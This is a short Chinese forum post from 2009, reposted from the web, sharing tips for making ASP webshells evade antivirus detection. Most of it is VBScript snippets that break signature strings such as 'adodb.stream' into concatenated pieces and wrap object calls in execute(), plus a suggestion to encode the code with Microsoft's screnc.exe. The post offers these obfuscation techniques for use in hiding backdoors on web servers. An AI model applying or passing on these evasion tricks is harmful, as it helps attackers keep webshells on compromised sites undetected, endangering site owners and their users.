|
发表于 2009-9-10 15:13:08
|显示全部楼层
关于免杀Webshell的一点经验之谈,转自网络,原作者未知
以下是引用片段:
dim tStream
set tStream = Server.CreateObject("adodb.stream")
改成如下形式:
dim tStream
set tStream = Server.CreateObject("ado" & "db.stre" & "am")
如果杀毒软件认为是病毒的关键字符串是一个对象的方法或属性
如:
tStream2.CopyTo tStream,200
可以改成:
execute("tStream2.Cop" & "yTo tStream,200")
比如可以把:
dim tStream
set tStream = Server.CreateObject("adodb.stream")
改成:
dim tStream
execute("set tStream = Ser" & "ver.Crea" & "teObject(""ado" & "db.stre" & "am"")")
另一种方法就是用加密软件对代码进行加密,比如用screnc.exe(微软出的网页加密软件)。 |
|